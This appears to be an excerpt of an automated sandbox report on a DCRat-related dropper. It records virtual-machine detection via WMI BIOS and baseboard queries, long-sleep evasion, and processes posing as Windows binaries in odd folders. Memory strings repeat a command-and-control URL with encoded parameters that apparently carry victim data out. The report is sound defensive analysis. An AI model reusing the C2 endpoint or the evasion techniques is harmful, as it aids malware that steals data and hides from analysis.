
Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\d3d9on12\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\d3d9on12\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\d3d9on12\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\d3d9on12\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\AppReadiness\audiodg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\AppReadiness\audiodg.exe

Window / User API: threadDelayed 506

Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DCRatBuild.sfx.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\ks4.021.3.10.391ru_25000.exe			Jump to dropped file

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe TID: 1444	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\d3d9on12\msiexec.exe TID: 6940	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe TID: 4292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe TID: 7100	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe TID: 6888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\AppReadiness\audiodg.exe TID: 1320	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\d3d9on12\msiexec.exe TID: 6160	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\AppReadiness\audiodg.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\d3d9on12\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\d3d9on12\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\AppReadiness\audiodg.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_004091E3 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_004091E3
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0040DB4B SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0040DB4B
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0016A5F4
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0017B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0017B8E0
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0018AAA8 FindFirstFileExA,	4_2_0018AAA8

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe

Code function: 4_2_0017DD72 VirtualQuery,GetSystemInfo,

4_2_0017DD72

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\AppReadiness\audiodg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Thread delayed: delay time: 922337203685477

Source: audiodg.exe, 00000012.00000002.909976728.000001D414FA4000.00000004.00000001.sdmp	Binary or memory string: /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp	Binary or memory string: /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.910515129.000001D41512C000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp	Binary or memory string: 0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye
Source: audiodg.exe, 00000012.00000002.914355080.000001D42D8A0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: audiodg.exe, 00000012.00000002.909976728.000001D414FA4000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp	Binary or memory string: ?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.912758776.000001D41552F000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFz
